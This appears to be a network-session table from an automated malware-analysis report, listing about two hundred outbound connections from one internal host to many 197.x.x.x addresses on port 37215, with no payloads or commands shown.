                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2885192.168.2.1536618197.130.129.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2886192.168.2.1548672197.120.139.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2887192.168.2.1540048197.78.222.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2888192.168.2.1544068197.182.41.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2889192.168.2.1560014197.80.191.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2890192.168.2.1554152197.205.247.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2891192.168.2.1543948197.41.164.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2892192.168.2.1546808197.41.153.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2893192.168.2.1557608197.188.70.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2894192.168.2.1543204197.33.77.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2895192.168.2.1548748197.25.41.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2896192.168.2.1534014197.194.44.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2897192.168.2.1559706197.108.224.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2898192.168.2.1558500197.27.9.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2899192.168.2.1542428197.170.168.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2900192.168.2.1544844197.218.160.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2901192.168.2.1544534197.251.189.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2902192.168.2.1535354197.246.168.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2903192.168.2.1547886197.47.96.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2904192.168.2.1536772197.103.94.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2905192.168.2.1546618197.120.145.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2906192.168.2.1538778197.214.213.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2907192.168.2.1537174197.248.154.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2908192.168.2.1553014197.5.192.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2909192.168.2.1538036197.10.81.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2910192.168.2.1551680197.49.129.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2911192.168.2.1558372197.155.169.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2912192.168.2.1545216197.153.88.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2913192.168.2.1554560197.147.69.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2914192.168.2.1559806197.124.173.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2915192.168.2.1554978197.148.124.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2916192.168.2.1543964197.103.165.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2917192.168.2.1543706197.185.32.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2918192.168.2.1556086197.44.75.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2919192.168.2.1532858197.101.7.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2920192.168.2.1538670197.52.46.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2921192.168.2.1538788197.158.57.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2922192.168.2.1537028197.11.16.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2923192.168.2.1548606197.207.219.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2924192.168.2.1539736197.52.18.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2925192.168.2.1546354197.42.95.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2926192.168.2.1546374197.246.248.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2927192.168.2.1558378197.120.245.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2928192.168.2.1536270197.205.10.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2929192.168.2.1557616197.117.99.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2930192.168.2.1532974197.203.55.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2931192.168.2.1557912197.224.174.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2932192.168.2.1552938197.242.22.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2933192.168.2.1559816197.100.148.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2934192.168.2.1544036197.113.185.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2935192.168.2.1552576197.182.123.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2936192.168.2.1535888197.224.231.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2937192.168.2.1558566197.220.221.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2938192.168.2.1547360197.56.176.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2939192.168.2.1554574197.28.20.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2940192.168.2.1551184197.60.99.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2941192.168.2.1552292197.113.233.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2942192.168.2.1555358197.19.66.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2943192.168.2.1558528197.205.163.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2944192.168.2.1535406197.161.192.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2945192.168.2.1540878197.241.2.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2946192.168.2.1560272197.251.31.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2947192.168.2.1536292197.191.215.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2948192.168.2.1558618197.224.85.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2949192.168.2.1533366197.49.48.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2950192.168.2.1537374197.47.202.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2951192.168.2.1560370197.222.55.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2952192.168.2.1559732197.154.171.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2953192.168.2.1557188197.53.137.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2954192.168.2.1546858197.152.168.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2955192.168.2.1548728197.15.152.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2956192.168.2.1548854197.246.235.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2957192.168.2.1552116197.144.11.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2958192.168.2.1554400197.109.142.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2959192.168.2.1537628197.20.250.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2960192.168.2.1552310197.169.21.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2961192.168.2.1545450197.153.200.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2962192.168.2.1552432197.156.250.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2963192.168.2.1533826197.31.156.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2964192.168.2.1545952197.107.209.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2965192.168.2.1540290197.187.188.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2966192.168.2.1546074197.48.145.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2967192.168.2.1541034197.253.123.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2968192.168.2.1552084197.212.23.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2969192.168.2.1537822197.154.214.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2970192.168.2.1541520197.9.208.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2971192.168.2.1544424197.39.29.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2972192.168.2.1555884197.142.77.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2973192.168.2.1555676197.93.116.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2974192.168.2.1559052197.175.62.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2975192.168.2.1551156197.56.242.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2976192.168.2.1543122197.32.58.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2977192.168.2.1555968197.65.120.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2978192.168.2.1532996197.101.103.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2979192.168.2.1556846197.104.38.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2980192.168.2.1543392197.56.128.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2981192.168.2.1555546197.205.74.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2982192.168.2.1544314197.89.171.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2983192.168.2.1536072197.240.146.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2984192.168.2.1551152197.195.143.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2985192.168.2.1550802197.135.237.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2986192.168.2.1554108197.17.100.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2987192.168.2.1534748197.254.41.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2988192.168.2.1535898197.236.81.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2989192.168.2.1550144197.19.105.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2990192.168.2.1538682197.160.251.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2991192.168.2.1542304197.18.251.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2992192.168.2.1559954197.62.115.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2993192.168.2.1539116197.131.162.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2994192.168.2.1556272197.106.224.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2995192.168.2.1549842197.148.232.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2996192.168.2.1544848197.34.15.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2997192.168.2.1552658197.219.67.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2998192.168.2.1545740197.242.121.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2999192.168.2.1546234197.200.199.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3000192.168.2.1537642197.73.97.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3001192.168.2.1536482197.129.21.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3002192.168.2.1540874197.67.168.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3003192.168.2.1544292197.72.174.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3004192.168.2.1555686197.8.101.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3005192.168.2.1559650197.35.120.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3006192.168.2.1557376197.98.108.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3007192.168.2.1543798197.48.52.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3008192.168.2.1551372197.71.155.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3009192.168.2.1552902197.13.230.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3010192.168.2.1553412197.183.27.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3011192.168.2.1540792197.91.23.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3012192.168.2.1557124197.90.228.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3013192.168.2.1534154197.142.203.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3014192.168.2.1548602197.7.46.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3015192.168.2.1560930197.28.159.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3016192.168.2.1532816197.89.14.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3017192.168.2.1546516197.48.218.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3018192.168.2.1559350197.48.82.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3019192.168.2.1535944197.192.20.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3020192.168.2.1552492197.37.19.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3021192.168.2.1554412197.161.151.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3022192.168.2.1558314197.98.3.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3023192.168.2.1557014197.56.103.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3024192.168.2.1553344197.179.137.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3025192.168.2.1560872197.144.125.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3026192.168.2.1549766197.238.249.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3027192.168.2.1546582197.117.195.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3028192.168.2.1544122197.65.139.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3029192.168.2.1545232197.234.106.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3030192.168.2.1544182197.188.130.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3031192.168.2.1534126197.203.74.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3032192.168.2.1538732197.142.47.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3033192.168.2.1558098197.193.254.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3034192.168.2.1542216197.151.143.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3035192.168.2.1553928197.233.132.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3036192.168.2.1550620197.185.70.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3037192.168.2.1552806197.68.141.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3038192.168.2.1557824197.156.226.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3039192.168.2.1552842197.206.176.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3040192.168.2.1557814197.79.155.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3041192.168.2.1540944197.28.23.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3042192.168.2.1557290197.27.236.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3043192.168.2.1554748197.109.164.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3044192.168.2.1550544197.16.67.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3045192.168.2.1542304197.113.103.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3046192.168.2.1538404197.168.186.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3047192.168.2.1558024197.93.15.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3048192.168.2.1559906197.120.84.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3049192.168.2.1551022197.63.41.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3050192.168.2.1543166197.240.79.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3051192.168.2.1558574197.19.124.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3052192.168.2.1542692197.152.70.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3053192.168.2.1553476197.62.7.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3054192.168.2.1534696197.132.211.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3055192.168.2.1558888197.199.5.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3056192.168.2.1555620197.177.45.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3057192.168.2.1559964197.153.112.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3058192.168.2.1549838197.75.9.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3059192.168.2.1536930197.170.3.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3060192.168.2.1536236197.186.236.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3061192.168.2.1552970197.92.12.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3062192.168.2.1559424197.180.82.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3063192.168.2.1534250197.211.78.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3064192.168.2.1536922197.134.168.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3065192.168.2.1554536197.229.131.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3066192.168.2.1538188197.43.26.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3067192.168.2.1534462197.14.244.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3068192.168.2.1533698197.168.88.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3069192.168.2.1535464197.241.48.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3070192.168.2.1552670197.173.80.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3071192.168.2.1554534197.91.240.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3072192.168.2.1539742197.101.215.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3073192.168.2.1552542197.62.187.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3074192.168.2.1559754197.74.53.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3075192.168.2.1537922197.143.93.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3076192.168.2.1536432197.143.90.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3077192.168.2.1552636197.247.126.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3078192.168.2.1537152197.146.161.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3079192.168.2.1543206197.49.249.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3080192.168.2.1544050197.168.35.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3081192.168.2.1541852197.113.212.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3082192.168.2.1557388197.196.168.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3083192.168.2.1557470197.246.86.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3084192.168.2.1541172197.232.237.7737215
